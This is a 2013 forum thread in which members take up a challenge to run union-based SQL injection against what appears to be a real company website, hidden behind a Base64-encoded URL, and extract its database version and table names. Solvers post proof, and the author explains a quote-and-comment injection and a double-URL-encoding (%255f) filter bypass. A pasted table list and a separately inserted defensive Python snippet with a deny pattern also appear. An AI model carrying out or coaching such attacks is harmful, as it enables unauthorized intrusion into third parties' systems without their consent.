Renegade
Posted August 7, 2013 (edited)

Target
aHR0cDovL3d3dy5jaXRyb2VuLXNhaW50bG91aXMuY29tL2ZyL2Rpc3RyaWJ1dGV1ci1jaGF0ZW5ldC9jaGF0ZW5ldF82Nzg=
Base64

Tasks:
- display version with your name
- display table names from primary database
- remove commas after table name (as in picture)

Proof:

Rules:
- use union select based SQLi
- post picture as proof
- send me your command to PM

Solvers:
- Hannibal.
- Todo
- ajkaro
- danyweb09

Solution:
this is my syntax (Base64)
for the injection I used '
for commenting it out I used -- -
to bypass _ I used %255f, that is: take _ and convert it to hex, so it becomes %5f, and then %5f in urlencode
to replace the comma after the tables I used "replace"
challenge closed

Edited September 25, 2013 by Renegade

Hannibal.
Posted August 7, 2013

Something like this?
Sorry for posting so late, I just woke up :">
Thanks for the challenge.

Todo
Posted August 7, 2013 (edited)

Edited August 7, 2013 by Todo

ajkaro
Posted August 8, 2013 (edited)

Nice challenge...:-)

Edited August 8, 2013 by ajkaro

dancezar (Active Members)
Posted August 8, 2013 (edited)

Thanks a lot for the challenge.
At first I thought it was very easy, but it wasn't really :))
I actually learned something :)
I'll be right back with an edit to leave a screenshot
// Done
http://s23.postimg.org/cue9sdxt7/rsz_screenshot_3.png

Edited August 8, 2013 by danyweb09

XoddX
Posted August 8, 2013

I got as far as the tables... can anyone help me with them? I tried various "things" but didn't succeed. I want you to help me for my own general education, not for the CH.
I'm waiting for a PM, please. Thank you.

Renegade (Author)
Posted August 8, 2013

> I got as far as the tables... can anyone help me with them? I tried various "things" but didn't succeed. I want you to help me for my own general education, not for the CH.
> I'm waiting for a PM, please. Thank you.

I'll post the solution at the end.
keep trying, don't give up.
good luck
feel free to use the academy's courses
http://pentesting-academy.com/MySQLiacademy/lv1.php?id=1

XoddX
Posted August 10, 2013

Can we have the solution? I managed to extract all of those but I can't get rid of those commas. So?

Hannibal.
Posted August 10, 2013

*** hint ***
have you by any chance searched the net for a table with the hex value for newline?

Renegade (Author)
Posted August 10, 2013

I'll post the solution tonight.
until then, a hint.
replace _ with %255f.
where does %255f come from???
take _ and convert it to hex, so it becomes %5f, and then %5f in urlencode
but besides that you also have to remove the , when displaying the tables in order to be added to the solvers.
good luck
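
Added example, not part of any post in this thread: `%255f` is `_` percent-encoded twice (`_` → `%5f` → `%255f`), so a filter that inspects the value after a single decode never sees the underscore, as in the hint above and in the solution in the first post. The Python sketch below shows the defensive counterpart: decode to a fixed point before filtering and flag multiply-encoded parameters. The deny pattern, policy, sample values and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed deny-pattern standing in for an input filter (assumption).
DENY = re.compile(r"information_schema|table_name", re.I)
MAX_PASSES = 5  # assumption: cap on decoding rounds


def canonicalize(value, max_passes=MAX_PASSES):
    """Percent-decode until the value stops changing; return (value, passes)."""
    passes = 0
    while passes < max_passes:
        decoded = unquote(value)
        if decoded == value:
            break
        value, passes = decoded, passes + 1
    return value, passes


def inspect(raw):
    """raw: a query-string value exactly as it appeared on the wire."""
    once = unquote(raw)  # what a decode-once filter sees
    canon, passes = canonicalize(raw)
    return {
        "naive_hit": bool(DENY.search(once)),
        "canonical_hit": bool(DENY.search(canon)),
        "multi_encoded": passes > 1,  # more than one encoding layer
        "canonical": canon,
    }


def decide(raw):
    """Assumed policy: block on a canonical match or on multi-layer encoding."""
    result = inspect(raw)
    return "block" if result["canonical_hit"] or result["multi_encoded"] else "allow"


# Constructed sample values (not taken from the thread's target).
SAMPLES = ["item_42", "100%25", "information%5fschema.tables",
           "information%255fschema.tables"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample, inspect(sample), decide(sample))
```

Filtering is only a detection layer here; parameterized queries are what remove the injection point itself.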

XoddX
Posted August 10, 2013

That's what I did, but I still need to remove " , " and
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS

Renegade (Author)
Posted August 10, 2013

that's not right.
I'll try to post the explained solution by 8 o'clock.
I'm on my phone now